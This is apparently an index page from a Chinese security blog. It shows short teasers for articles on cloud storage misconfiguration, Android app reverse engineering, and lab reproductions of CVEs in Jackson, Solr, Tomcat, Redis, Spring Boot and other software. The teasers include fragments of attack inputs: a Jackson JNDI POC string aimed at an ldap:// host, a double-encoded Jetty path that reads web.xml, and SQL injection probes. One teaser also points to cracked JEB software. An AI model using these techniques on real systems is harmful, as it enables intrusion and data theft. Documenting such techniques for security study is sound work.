云上攻防--云服务&&对象存储(域名接管)&&弹性计算(元数据泄露) 对象存储 各个厂商对于对象存储的叫法不同，但是除了叫法基本没有其他区别。 对象存储各大云名词： 阿里云：OSS腾讯云：COS华为云：OBS谷歌云：GCS微软云：Blob亚马逊云：S3对于对象存储的漏洞或者说错误配置点如下 权限配置错误 权限Bucket授权策略：设置ListObject显示完整结构(类似于目录遍历) 权限Bucket读写权限：公共读写直接PUT文件任意上传，由于管理员配置对象存储时错误配置公共读写权限，使得任何人都可以进行写入，通过PUT方法即可任意上传文件。 域名接管...

JEB环境配置 安装java环境变量(最好jdk11) 安装adb环境变量 设置adb环境变量最好以Android命名 启动开发者模式 设置-->关于平板电脑-->版本号(单机五次) 开启USB调试 设置-->系统-->高级-->开发者选项-->USB调试开启USB调试目的是为了后续让JEB能够获取模拟器上的进程 安装激活JEB 软件安装包和破解参考吾爱破解文章JEB动态调试Smali-真机/模拟器（详细，新手必看） JEB动态调试 使用的吾爱破解中大佬课程《安卓逆向那点事》中提供的练习demo第四关来练习动态调试。 在进行动态调试前必须在...

APP攻防--反模拟器&反代理&反证书&真机逃逸&XP框架&Frida技术 APP抓包技术 关于APP抓包，使用burpsuite抓模拟器中的数据包，需要将模拟器中的网络设置代理，代理地址为burpsuite监听的地址与端口，要想成功获取https数据包，需要将burpsuite证书导入模拟器中，在Android7.0之后的系统需要将证书导入系统认证，具体操作参考转载--逍遥模拟器与burpsuite抓包配置问题 反模拟器检测绕过 在对目标进行抓包渗透时，有时候会显示检测到模拟器，目标APP并不能正常运行。面对反模拟器时，一般使用以下三种思路进行绕过 ...

Jackson--FastJson--XStream--代码执行&&反序列化 Jackson代码执行(CVE-2020-8840) 影响范围 2.0.0<=FasterXMLjackson-databindVersion<=2.9.10.2不受影响版本FasterXMLjackson-databind=2.8.11.5FasterXMLjackson-databind=2.9.10.3 漏洞利用 POC： Stringjson="["org.apache.xbean.propertyeditor.JndiConverter",{"asText":"ldap://l...

SolrShiroLog4j2命令执行--文件读取--反序列化--身份权限绕过--命令执行 solr远程命令执行(CVE-2019-17558) 漏洞简介 ApacheVelocity是一个基于Java的模板引擎，它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目，旨在确保Web应用程序在表示层和业务逻辑层之间的隔离（即MVC设计模式）。ApacheSolr5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能，利用Velocity-SSTI漏洞在Solr系统上执行任意代码。 影响范围 Ap...

ctfshow--web入门--文件上传 目录 ctfshow--web入门--文件上传 web151(前端校验) web152(content-type) web153(.user.ini) web154(内容检测'php') web155(内容检测'php') web156(内容检测'[') web157(内容检测'php''[]''{}'';') web158(文件检测'php''{''['';''log') web159(日志包含) web160(日志空格检测) web161(日志文件头检测) web162&&web163(session包含) web164...

Nginx文件名逻辑漏洞（CVE-2013-4547）(Vulhub) 漏洞简介 在Nginx0.8.411.4.3/1.5.01.5.7版本中存在错误解析用户请求的url信息，从而导致文件代码执行，权限绕过等问题。 适用环境 Nginx0.8.411.4.3/1.5.01.5.7版本 漏洞成因 漏洞成因大概为Nginx本身并不能解析PHP代码，只能通过加载PHP模块来进行解析代码。通过正则表达式来匹配以.php结尾的请求路径交给PHP模块去解析，但是Nginx在加载文件名时遇到‘\0’便会停止读取‘\0’后面的内容，于是通过以上思路，我们在进行文件上传的时候，文件名应该设置为1.gif,在进...

SQL注入 mysql注入目的：获取当前web权限 mysql注入--常规查询&union联合查询 MYSQL--Web组成架构服务器搭建web服务可能存在多个站点搭建在一台服务器中，数据集中存储在数据库中，因此对数据库的管理也可以分为两种架构：统一用户管理数据库，即对所有站点数据库的管理均为Root权限用户管理一对一用户管理数据库，即对不同站点数据库管理分为不同用户管理各自站点数据信息（最小权限原则） 判断注入点的四个信息系统----Windows/Linux(大小写敏感与否/文件路径选择) @@version_compile_os//查看当前数据库所在服务器系统 用户----...

Web攻防--JS算法逆向--断点调试--反调试&&代码混淆绕过 JS算法逆向 在进行渗透测试过程中，在一些功能点进行参数注入或者枚举爆破等过程中，会出现参数进行加密的情况，但是我们输入参数并不是加密状态，即便测试点存在漏洞也不可能测试成功，这时候便需要将所提交参数进行加密后在进行注入，针对JS应用我们可以采用JS断点调试的方法将加密算法逆向出来，再使用插件将加密后的参数进行注入 代码全局搜索即将参数提交的网址、目录等关键字在开发者工具中进行搜索，再对JS源码进行分析，找出加密算法 文件流程断点即查看登录数据包中所调用执行堆栈，文件执行流程为从下往上执行，选用其中可能存在加密...

预编译 编译器在编译sql语句时，会依次进行词法分析、语法分析、语义分析等操作，预编译技术会让数据库跳过编译阶段，也就无法就进行词法分析，关键字不会被拆开，注入语句也就不会被识别为SQL的关键字，从而防止恶意注入语句改变原有SQL语句本身逻辑。 Java_JDBC注入 在使用JDBC进行数据库操作时，有以下几种情况会产生SQL注入问题 使用Statement方法单纯拼接SQL语句演示代码 //采用Statement方法拼接SQL语句，导致注入产生 publicStringvul1(Stringid){ Class.forName("com.mysql.cj.jdbc.Driver")...

JNDI注入 什么是JNDIJNDI全称为JavaNamingandDirectoryInterface（Java命名和目录接口），是一组应用程序接口，为开发人员查找和访问各种资源提供了统一的通用接口，可以用来定义用户、网络、机器、对象和服务等各种资源。 JNDI支持的服务主要有：DNS、LDAP、CORBA、RMI等。 简单从安全角度来看待JNDI就是Java中的一组接口，在其所支持的服务中最常用的就是RMI和LDAP服务RMI：远程方法调用注册表LDAP：轻量级目录访问协议通过这两种协议可以使目标服务器加载远程Class文件，攻击者通过构造Class文件来达到RCE的效果在jdk中提供JD...

Redis未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543) 环境复现 采用Vulfocus靶场进行环境复现，官网docker搭建有问题，具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败 CNVD-2015-07557未授权访问 影响版本 Redis<=5.0.5 漏洞探测 使用端口扫描工具等探测到目标主机使用了Redis服务对于Redis服务的未授权访问，首先需要确认Redis未授权是否存在，使用Redis数据库客户端进行连接测试，如何没有密码，即未...

Couchdb-权限绕过--命令执行--(CVE-2017-12635)&&(CVE-2017-12636)--H2database命令执行--(CVE-2022-23221) 环境概述 采用Vulfocus靶场环境进行复现，搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。 CouchdbCVE-2017-12635权限绕过 漏洞概述 ApacheCouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的...

Apache(2.4.492.4.50)--目录遍历--命令执行--(CVE-2021-42013)&&(CVE-2021-41773) 复现环境 采用Vulfocus靶场环境进行复现，搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。 漏洞简介 ApacheHTTPServer是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点，发现ApacheHTTPServer2.4.50中针对CVE-2021-41773的修复不够充分。攻击者可以使用路径遍历攻击将URL映射到由类似...

Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938) 复现环境 采用Vulfocus靶场环境进行复现，搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。 CVE-2017-12615文件上传 漏洞简介 当存在漏洞的Tomcat运行在Windows/Linux主机上，且启用了HTTPPUT请求方法（例如，将readonly初始化参数由默认值设置为false），攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件，JSP文件中的恶意代码将...

Jenkins命令执行-jetty敏感信息泄露--(CVE-2021-2816)&&(CVE-2017-1000353)&&(CVE-2018-1000861) jetty敏感信息泄露（CVE-2021-28169） 漏洞简介 对于<=9.4.40、<=10.0.2、<=11.0.2的EclipseJetty版本，对带有双重编码路径的ConcatServlet的请求可以访问WEB-INF目录中的受保护资源。例如，对/concat?/%2557EB-INF/web.xml的请求可以检索web.xml文件。这可能会泄露有关Web应用程序实施的敏感信...

SpringBoot目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296) SpringBoot目录遍历（CVE-2021-21234） 漏洞简介 spring-boot-actuator-logview是一个简单的日志文件查看器作为SpringBoot执行器端点，在0.2.13版本之前存在着目录遍历漏洞，编号CVE-2021-21234。漏洞本质是SpringBoot执行器通过请求的参数来指定文件名和文件夹路径，经过组合拼接...